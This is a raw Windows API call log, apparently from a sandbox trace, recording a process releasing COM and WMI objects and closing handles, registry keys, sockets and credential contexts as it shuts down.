[0234.333] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.333] IUnknown:Release (This=0x5612d68) returned 0x2 [0234.333] IUnknown:Release (This=0x5612d68) returned 0x1 [0234.333] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.333] IUnknown:Release (This=0x56173b0) returned 0x2 [0234.333] IUnknown:Release (This=0x56173b0) returned 0x1 [0234.333] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.333] IUnknown:Release (This=0x5617818) returned 0x2 [0234.333] IUnknown:Release (This=0x5617818) returned 0x1 [0234.333] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.333] IUnknown:Release (This=0x560c980) returned 0x2 [0234.333] IUnknown:Release (This=0x560c980) returned 0x1 [0234.333] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.333] IUnknown:Release (This=0x560cb18) returned 0x2 [0234.333] IUnknown:Release (This=0x560cb18) returned 0x1 [0234.333] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.333] IUnknown:Release (This=0x560ccb0) returned 0x2 [0234.333] IUnknown:Release (This=0x560ccb0) returned 0x1 [0234.333] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.333] IUnknown:Release (This=0x560ce48) returned 0x2 [0234.333] IUnknown:Release (This=0x560ce48) returned 0x1 [0234.333] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.333] IUnknown:Release (This=0x560cfe0) returned 0x2 [0234.333] IUnknown:Release (This=0x560cfe0) returned 0x1 [0234.334] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.334] IUnknown:Release (This=0x560d178) returned 0x2 [0234.334] IUnknown:Release (This=0x560d178) returned 0x1 [0234.334] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.334] IUnknown:Release (This=0x560d310) returned 0x2 [0234.334] IUnknown:Release (This=0x560d310) returned 0x1 [0234.334] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.334] IUnknown:Release (This=0x560d4a8) returned 0x2 [0234.334] IUnknown:Release (This=0x560d4a8) returned 0x1 [0234.334] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.334] IUnknown:Release (This=0x560d640) returned 0x2 [0234.334] IUnknown:Release (This=0x560d640) returned 0x1 [0234.334] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.334] IUnknown:Release (This=0x560d7d8) returned 0x2 [0234.334] IUnknown:Release (This=0x560d7d8) returned 0x1 [0234.334] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.334] IUnknown:Release (This=0x560d970) returned 0x2 [0234.334] IUnknown:Release (This=0x560d970) returned 0x1 [0234.334] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.334] IUnknown:Release (This=0x560db08) returned 0x2 [0234.334] IUnknown:Release (This=0x560db08) returned 0x1 [0234.334] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.334] IUnknown:Release (This=0x560dca0) returned 0x2 [0234.334] IUnknown:Release (This=0x560dca0) returned 0x1 [0234.334] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.334] IUnknown:Release (This=0x560de38) returned 0x2 [0234.334] IUnknown:Release (This=0x560de38) returned 0x1 [0234.334] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.334] IUnknown:Release (This=0x560dfd0) returned 0x2 [0234.334] IUnknown:Release (This=0x560dfd0) returned 0x1 [0234.334] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.335] IUnknown:Release (This=0x560e168) returned 0x2 [0234.335] IUnknown:Release (This=0x560e168) returned 0x1 [0234.335] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.335] IUnknown:Release (This=0x560e300) returned 0x2 [0234.335] IUnknown:Release (This=0x560e300) returned 0x1 [0234.335] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.335] IUnknown:Release (This=0x560e498) returned 0x2 [0234.335] IUnknown:Release (This=0x560e498) returned 0x1 [0234.335] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.335] IUnknown:Release (This=0x560e630) returned 0x2 [0234.335] IUnknown:Release (This=0x560e630) returned 0x1 [0234.335] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.335] IUnknown:Release (This=0x560e7c8) returned 0x2 [0234.335] IUnknown:Release (This=0x560e7c8) returned 0x1 [0234.335] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.335] IUnknown:Release (This=0x562dd38) returned 0x2 [0234.335] IUnknown:Release (This=0x562dd38) returned 0x1 [0234.335] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.335] IUnknown:Release (This=0x562ded0) returned 0x2 [0234.335] IUnknown:Release (This=0x562ded0) returned 0x1 [0234.335] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.335] IUnknown:Release (This=0x562e068) returned 0x2 [0234.335] IUnknown:Release (This=0x562e068) returned 0x1 [0234.335] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.335] IUnknown:Release (This=0x562e200) returned 0x2 [0234.335] IUnknown:Release (This=0x562e200) returned 0x1 [0234.335] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.335] IUnknown:Release (This=0x562e398) returned 0x2 [0234.335] IUnknown:Release (This=0x562e398) returned 0x1 [0234.335] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.336] IUnknown:Release (This=0x562e530) returned 0x2 [0234.336] IUnknown:Release (This=0x562e530) returned 0x1 [0234.336] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.336] IUnknown:Release (This=0x562e6c8) returned 0x2 [0234.336] IUnknown:Release (This=0x562e6c8) returned 0x1 [0234.336] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.336] IUnknown:Release (This=0x562e860) returned 0x2 [0234.336] IUnknown:Release (This=0x562e860) returned 0x1 [0234.336] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.336] IUnknown:Release (This=0x562e9f8) returned 0x2 [0234.336] IUnknown:Release (This=0x562e9f8) returned 0x1 [0234.336] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.336] IUnknown:Release (This=0x562eb90) returned 0x2 [0234.336] IUnknown:Release (This=0x562eb90) returned 0x1 [0234.336] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.336] IUnknown:Release (This=0x562ed28) returned 0x2 [0234.336] IUnknown:Release (This=0x562ed28) returned 0x1 [0234.336] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.336] IUnknown:Release (This=0x562eec0) returned 0x2 [0234.336] IUnknown:Release (This=0x562eec0) returned 0x1 [0234.336] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.336] IUnknown:Release (This=0x562f058) returned 0x2 [0234.336] IUnknown:Release (This=0x562f058) returned 0x1 [0234.336] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.336] IUnknown:Release (This=0x562f1f0) returned 0x2 [0234.336] IUnknown:Release (This=0x562f1f0) returned 0x1 [0234.336] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.336] IUnknown:Release (This=0x562f388) returned 0x2 [0234.336] IUnknown:Release (This=0x562f388) returned 0x1 [0234.336] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.336] IUnknown:Release (This=0x562f520) returned 0x2 [0234.337] IUnknown:Release (This=0x562f520) returned 0x1 [0234.337] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.337] IUnknown:Release (This=0x562f6b8) returned 0x2 [0234.337] IUnknown:Release (This=0x562f6b8) returned 0x1 [0234.337] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.337] IUnknown:Release (This=0x562f850) returned 0x2 [0234.337] IUnknown:Release (This=0x562f850) returned 0x1 [0234.337] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.337] IUnknown:Release (This=0x562f9e8) returned 0x2 [0234.337] IUnknown:Release (This=0x562f9e8) returned 0x1 [0234.337] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.337] IUnknown:Release (This=0x562fb80) returned 0x2 [0234.337] IUnknown:Release (This=0x562fb80) returned 0x1 [0234.337] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.337] IUnknown:Release (This=0x56357b0) returned 0x2 [0234.337] IUnknown:Release (This=0x56357b0) returned 0x1 [0234.337] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.337] IUnknown:Release (This=0x5635948) returned 0x2 [0234.337] IUnknown:Release (This=0x5635948) returned 0x1 [0234.337] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.337] IUnknown:Release (This=0x5635ae0) returned 0x2 [0234.337] IUnknown:Release (This=0x5635ae0) returned 0x1 [0234.337] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.337] IUnknown:Release (This=0x5635c78) returned 0x2 [0234.337] IUnknown:Release (This=0x5635c78) returned 0x1 [0234.337] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.337] IUnknown:Release (This=0x5635e10) returned 0x2 [0234.337] IUnknown:Release (This=0x5635e10) returned 0x1 [0234.337] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.337] IUnknown:Release (This=0x5635fa8) returned 0x2 [0234.338] IUnknown:Release (This=0x5635fa8) returned 0x1 [0234.338] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.338] IUnknown:Release (This=0x5636140) returned 0x2 [0234.338] IUnknown:Release (This=0x5636140) returned 0x1 [0234.338] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.338] IUnknown:Release (This=0x56362d8) returned 0x2 [0234.338] IUnknown:Release (This=0x56362d8) returned 0x1 [0234.338] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.338] IUnknown:Release (This=0x5636470) returned 0x2 [0234.338] IUnknown:Release (This=0x5636470) returned 0x1 [0234.338] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.338] IUnknown:Release (This=0x5636608) returned 0x2 [0234.338] IUnknown:Release (This=0x5636608) returned 0x1 [0234.338] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.338] IUnknown:Release (This=0x56367a0) returned 0x2 [0234.338] IUnknown:Release (This=0x56367a0) returned 0x1 [0234.338] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.338] IUnknown:Release (This=0x5636938) returned 0x2 [0234.338] IUnknown:Release (This=0x5636938) returned 0x1 [0234.338] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.338] IUnknown:Release (This=0x5636ad0) returned 0x2 [0234.338] IUnknown:Release (This=0x5636ad0) returned 0x1 [0234.338] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.338] IUnknown:Release (This=0x5636c68) returned 0x2 [0234.338] IUnknown:Release (This=0x5636c68) returned 0x1 [0234.338] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.338] IUnknown:Release (This=0x5636e00) returned 0x2 [0234.339] IUnknown:Release (This=0x5636e00) returned 0x1 [0234.339] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.339] IUnknown:Release (This=0x5636f98) returned 0x2 [0234.339] IUnknown:Release (This=0x5636f98) returned 0x1 [0234.339] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.339] IUnknown:Release (This=0x5637130) returned 0x2 [0234.339] IUnknown:Release (This=0x5637130) returned 0x1 [0234.339] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.339] IUnknown:Release (This=0x56372c8) returned 0x2 [0234.340] IUnknown:Release (This=0x56372c8) returned 0x1 [0234.340] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.340] IUnknown:Release (This=0x5637460) returned 0x2 [0234.340] IUnknown:Release (This=0x5637460) returned 0x1 [0234.340] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.340] WbemLocator:IUnknown:Release (This=0x5642740) returned 0x1 [0234.340] WbemLocator:IUnknown:Release (This=0x5642740) returned 0x0 [0234.340] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.340] IUnknown:Release (This=0x56375f8) returned 0x2 [0234.340] IUnknown:Release (This=0x56375f8) returned 0x1 [0234.340] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.340] WbemLocator:IUnknown:Release (This=0x56427b0) returned 0x1 [0234.340] WbemLocator:IUnknown:Release (This=0x56427b0) returned 0x0 [0234.340] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.340] IUnknown:Release (This=0x55c6560) returned 0x2 [0234.340] IUnknown:Release (This=0x55c6560) returned 0x1 [0234.340] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.340] WbemLocator:IUnknown:Release (This=0x5642880) returned 0x1 [0234.340] WbemLocator:IUnknown:Release (This=0x5642880) returned 0x0 [0234.340] CoGetContextToken (in: pToken=0x461f8e8 | out: pToken=0x461f8e8) returned 0x0 [0234.340] IUnknown:Release (This=0x55c6890) returned 0x2 [0234.340] IUnknown:Release (This=0x55c6890) returned 0x1 [0234.341] IUnknown:Release (This=0x560d970) returned 0x0 [0234.341] IUnknown:Release (This=0x560d7d8) returned 0x0 [0234.341] IUnknown:Release (This=0x560d640) returned 0x0 [0234.341] IUnknown:Release (This=0x560d4a8) returned 0x0 [0234.341] IUnknown:Release (This=0x560d310) returned 0x0 [0234.342] IUnknown:Release (This=0x560d178) returned 0x0 [0234.342] IUnknown:Release (This=0x560cfe0) returned 0x0 [0234.342] IUnknown:Release (This=0x560ce48) returned 0x0 [0234.342] IUnknown:Release (This=0x560ccb0) returned 0x0 [0234.342] IUnknown:Release (This=0x560cb18) returned 0x0 [0234.343] IUnknown:Release (This=0x560c980) returned 0x0 [0234.343] IUnknown:Release (This=0x5617818) returned 0x0 [0234.343] IUnknown:Release (This=0x56173b0) returned 0x0 [0234.343] IUnknown:Release (This=0x5612d68) returned 0x0 [0234.343] IUnknown:Release (This=0x5612900) returned 0x0 [0234.344] IUnknown:Release (This=0x56115c8) returned 0x0 [0234.344] IUnknown:Release (This=0x5611430) returned 0x0 [0234.344] IUnknown:Release (This=0x5611770) returned 0x0 [0234.344] IUnknown:Release (This=0x560fc30) returned 0x0 [0234.344] IUnknown:Release (This=0x53a7b50) returned 0x0 [0234.344] IUnknown:Release (This=0x5454cf8) returned 0x0 [0234.345] IUnknown:Release (This=0x53fddd8) returned 0x0 [0234.345] IUnknown:Release (This=0x541a768) returned 0x0 [0234.345] IUnknown:Release (This=0x5418760) returned 0x0 [0234.345] IUnknown:Release (This=0x53f69d0) returned 0x0 [0234.345] IUnknown:Release (This=0x55c6890) returned 0x0 [0234.346] IUnknown:Release (This=0x56375f8) returned 0x0 [0234.346] IUnknown:Release (This=0x55c6560) returned 0x0 [0234.346] IUnknown:Release (This=0x5637460) returned 0x0 [0234.346] IUnknown:Release (This=0x56372c8) returned 0x0 [0234.346] IUnknown:Release (This=0x5637130) returned 0x0 [0234.347] IUnknown:Release (This=0x5636f98) returned 0x0 [0234.347] IUnknown:Release (This=0x5636e00) returned 0x0 [0234.347] IUnknown:Release (This=0x5636c68) returned 0x0 [0234.347] IUnknown:Release (This=0x5636ad0) returned 0x0 [0234.347] IUnknown:Release (This=0x5636938) returned 0x0 [0234.347] IUnknown:Release (This=0x56367a0) returned 0x0 [0234.348] IUnknown:Release (This=0x5636608) returned 0x0 [0234.348] IUnknown:Release (This=0x5636470) returned 0x0 [0234.348] IUnknown:Release (This=0x56362d8) returned 0x0 [0234.348] IUnknown:Release (This=0x5636140) returned 0x0 [0234.348] IUnknown:Release (This=0x5635fa8) returned 0x0 [0234.348] IUnknown:Release (This=0x5635e10) returned 0x0 [0234.349] IUnknown:Release (This=0x5635c78) returned 0x0 [0234.349] IUnknown:Release (This=0x5635ae0) returned 0x0 [0234.349] IUnknown:Release (This=0x5635948) returned 0x0 [0234.349] IUnknown:Release (This=0x56357b0) returned 0x0 [0234.349] IUnknown:Release (This=0x562fb80) returned 0x0 [0234.350] IUnknown:Release (This=0x562f9e8) returned 0x0 [0234.350] IUnknown:Release (This=0x562f850) returned 0x0 [0234.350] IUnknown:Release (This=0x562f6b8) returned 0x0 [0234.350] IUnknown:Release (This=0x562f520) returned 0x0 [0234.350] IUnknown:Release (This=0x562f388) returned 0x0 [0234.350] IUnknown:Release (This=0x562f1f0) returned 0x0 [0234.351] IUnknown:Release (This=0x562f058) returned 0x0 [0234.351] IUnknown:Release (This=0x562eec0) returned 0x0 [0234.351] IUnknown:Release (This=0x562ed28) returned 0x0 [0234.351] IUnknown:Release (This=0x562eb90) returned 0x0 [0234.351] IUnknown:Release (This=0x562e9f8) returned 0x0 [0234.351] IUnknown:Release (This=0x562e860) returned 0x0 [0234.352] IUnknown:Release (This=0x562e6c8) returned 0x0 [0234.352] IUnknown:Release (This=0x562e530) returned 0x0 [0234.352] IUnknown:Release (This=0x562e398) returned 0x0 [0234.352] IUnknown:Release (This=0x562e200) returned 0x0 [0234.353] IUnknown:Release (This=0x562e068) returned 0x0 [0234.353] IUnknown:Release (This=0x562ded0) returned 0x0 [0234.353] IUnknown:Release (This=0x562dd38) returned 0x0 [0234.353] IUnknown:Release (This=0x560e7c8) returned 0x0 [0234.353] IUnknown:Release (This=0x560e630) returned 0x0 [0234.354] IUnknown:Release (This=0x560e498) returned 0x0 [0234.354] IUnknown:Release (This=0x560e300) returned 0x0 [0234.354] IUnknown:Release (This=0x560e168) returned 0x0 [0234.354] IUnknown:Release (This=0x560dfd0) returned 0x0 [0234.355] IUnknown:Release (This=0x560de38) returned 0x0 [0234.355] IUnknown:Release (This=0x560dca0) returned 0x0 [0234.355] IUnknown:Release (This=0x560db08) returned 0x0 [0234.355] RegCloseKey (hKey=0x60c) returned 0x0 [0234.355] RegCloseKey (hKey=0x608) returned 0x0 [0234.356] RegCloseKey (hKey=0x610) returned 0x0 [0239.618] EtwEventUnregister () returned 0x0 [0239.618] EtwEventUnregister () returned 0x0 [0239.618] EtwEventUnregister () returned 0x0 [0239.621] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x27c [0239.622] PostMessageW (hWnd=0x900cc, Msg=0x12, wParam=0x0, lParam=0x0) returned 1 [0239.622] CoGetContextToken (in: pToken=0x461f534 | out: pToken=0x461f534) returned 0x0 [0239.622] IUnknown:QueryInterface (in: This=0x6d0ca0, riid=0x7258b24c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x461f558 | out: ppvObject=0x461f558*=0x6d0cac) returned 0x0 [0239.622] IComThreadingInfo:GetCurrentThreadType (in: This=0x6d0cac, pThreadType=0x461f584 | out: pThreadType=0x461f584*=0) returned 0x0 [0239.622] IUnknown:Release (This=0x6d0cac) returned 0x1 [0239.674] CoGetContextToken (in: pToken=0x461f54c | out: pToken=0x461f54c) returned 0x0 [0239.674] IUnknown:QueryInterface (in: This=0x6d0ca0, riid=0x7258b24c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x461f570 | out: ppvObject=0x461f570*=0x6d0cac) returned 0x0 [0239.674] IComThreadingInfo:GetCurrentThreadType (in: This=0x6d0cac, pThreadType=0x461f59c | out: pThreadType=0x461f59c*=0) returned 0x0 [0239.674] IUnknown:Release (This=0x6d0cac) returned 0x1 [0239.686] IUnknown:Release (This=0x560db08) returned 0x2 [0239.691] CloseHandle (hObject=0x5e4) returned 1 [0239.692] EtwEventUnregister () returned 0x0 [0239.700] UnmapViewOfFile (lpBaseAddress=0x4e0000) returned 1 [0239.701] CloseHandle (hObject=0x618) returned 1 [0239.702] FreeCredentialsHandle (phCredential=0x267dd24) returned 0x0 [0239.703] FreeContextBuffer (in: pvContextBuffer=0x5643878 | out: pvContextBuffer=0x5643878) returned 0x0 [0239.703] CloseHandle (hObject=0x340) returned 1 [0239.703] UnmapViewOfFile (lpBaseAddress=0x3b0000) returned 1 [0239.704] CloseHandle (hObject=0x27c) returned 1 [0239.705] CertFreeCRLContext (pCrlContext=0x55aa280) returned 1 [0239.706] CloseHandle (hObject=0x5b8) returned 1 [0239.706] CertFreeCRLContext (pCrlContext=0x563ff88) returned 1 [0239.706] CertFreeCRLContext (pCrlContext=0x563fe48) returned 1 [0239.707] setsockopt (s=0x268, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0239.707] closesocket (s=0x268) returned 0 [0239.708] setsockopt (s=0x358, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0239.708] closesocket (s=0x358) returned 0 [0239.709] CloseHandle (hObject=0x35c) returned 1 [0239.709] setsockopt (s=0x350, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0239.709] closesocket (s=0x350) returned 0 [0239.710] CloseHandle (hObject=0x354) returned 1 [0239.710] CertCloseStore (hCertStore=0x5476b20, dwFlags=0x0) returned 1 [0239.711] CertFreeCRLContext (pCrlContext=0x563fe48) returned 1 [0239.711] CertFreeCRLContext (pCrlContext=0x563fe98) returned 1 [0239.712] FreeCredentialsHandle (phCredential=0x25a6c14) returned 0x0 [0239.713] DeleteSecurityContext (phContext=0x25a6dc0) returned 0x0 [0239.713] CloseHandle (hObject=0x530) returned 1 [0239.713] RegCloseKey (hKey=0x80000004) returned 0x0 [0239.714] WinHttpCloseHandle (hInternet=0x705db0) returned 1 [0239.714] setsockopt (s=0x34c, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0239.714] closesocket (s=0x34c) returned 0 [0239.715] CloseHandle (hObject=0x2ec) returned 1 [0239.715] CloseHandle (hObject=0x2e8) returned 1 [0239.716] RegCloseKey (hKey=0x2e4) returned 0x0 [0239.716] CloseHandle (hObject=0x2e0) returned 1 [0239.716] RegCloseKey (hKey=0x2dc) returned 0x0 [0239.716] CloseHandle (hObject=0x2d8) returned 1 [0239.717] RegCloseKey (hKey=0x2d4) returned 0x0 [0239.717] RegCloseKey (hKey=0x2d0) returned 0x0 [0239.717] CloseHandle (hObject=0x2b8) returned 1 [0239.718] setsockopt (s=0x2ac, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0239.718] closesocket (s=0x2ac) returned 0 [0239.718] CloseHandle (hObject=0x2b0) returned 1 [0239.718] setsockopt (s=0x278, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0239.718] closesocket (s=0x278) returned 0 [0239.719] CloseHandle (hObject=0x2a8) returned 1 [0239.722] CoGetContextToken (in: pToken=0x461f5a4 | out: pToken=0x461f5a4) returned 0x0 [0239.722] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.722] WbemDefPath:IUnknown:Release (This=0x560ede0) returned 0x1 [0239.722] WbemDefPath:IUnknown:Release (This=0x560ede0) returned 0x0 [0239.722] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.722] WbemDefPath:IUnknown:Release (This=0x56381a0) returned 0x1 [0239.722] WbemDefPath:IUnknown:Release (This=0x56381a0) returned 0x0 [0239.723] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.723] WbemDefPath:IUnknown:Release (This=0x5637f00) returned 0x1 [0239.723] WbemDefPath:IUnknown:Release (This=0x5637f00) returned 0x0 [0239.723] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.723] WbemDefPath:IUnknown:Release (This=0x561a740) returned 0x1 [0239.723] WbemDefPath:IUnknown:Release (This=0x561a740) returned 0x0 [0239.723] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.723] WbemDefPath:IUnknown:Release (This=0x5638c20) returned 0x1 [0239.723] WbemDefPath:IUnknown:Release (This=0x5638c20) returned 0x0 [0239.723] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.723] WbemDefPath:IUnknown:Release (This=0x56444c8) returned 0x1 [0239.723] WbemDefPath:IUnknown:Release (This=0x56444c8) returned 0x0 [0239.723] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.723] WbemDefPath:IUnknown:Release (This=0x560ea60) returned 0x1 [0239.723] WbemDefPath:IUnknown:Release (This=0x560ea60) returned 0x0 [0239.724] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.724] WbemDefPath:IUnknown:Release (This=0x5631578) returned 0x1 [0239.724] WbemDefPath:IUnknown:Release (This=0x5631578) returned 0x0 [0239.724] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.724] WbemDefPath:IUnknown:Release (This=0x56441b8) returned 0x1 [0239.724] WbemDefPath:IUnknown:Release (This=0x56441b8) returned 0x0 [0239.724] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.724] WbemDefPath:IUnknown:Release (This=0x5638520) returned 0x1 [0239.724] WbemDefPath:IUnknown:Release (This=0x5638520) returned 0x0 [0239.724] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.724] WbemDefPath:IUnknown:Release (This=0x561a3c0) returned 0x1 [0239.724] WbemDefPath:IUnknown:Release (This=0x561a3c0) returned 0x0 [0239.724] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.724] WbemDefPath:IUnknown:Release (This=0x5630d98) returned 0x1 [0239.724] WbemDefPath:IUnknown:Release (This=0x5630d98) returned 0x0 [0239.724] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.724] WbemDefPath:IUnknown:Release (This=0x56311f8) returned 0x1 [0239.724] WbemDefPath:IUnknown:Release (This=0x56311f8) returned 0x0 [0239.725] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.725] WbemDefPath:IUnknown:Release (This=0x5630af8) returned 0x1 [0239.725] WbemDefPath:IUnknown:Release (This=0x5630af8) returned 0x0 [0239.725] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.725] WbemDefPath:IUnknown:Release (This=0x561a040) returned 0x1 [0239.725] WbemDefPath:IUnknown:Release (This=0x561a040) returned 0x0 [0239.725] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.725] WbemDefPath:IUnknown:Release (This=0x5638b40) returned 0x1 [0239.725] WbemDefPath:IUnknown:Release (This=0x5638b40) returned 0x0 [0239.725] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.725] WbemDefPath:IUnknown:Release (This=0x56388a0) returned 0x1 [0239.725] WbemDefPath:IUnknown:Release (This=0x56388a0) returned 0x0 [0239.725] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.725] WbemDefPath:IUnknown:Release (This=0x5630e78) returned 0x1 [0239.725] WbemDefPath:IUnknown:Release (This=0x5630e78) returned 0x0 [0239.726] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.726] WbemDefPath:IUnknown:Release (This=0x5644378) returned 0x1 [0239.726] WbemDefPath:IUnknown:Release (This=0x5644378) returned 0x0 [0239.726] CoGetContextToken (in: pToken=0x461f528 | out: pToken=0x461f528) returned 0x0 [0239.726] 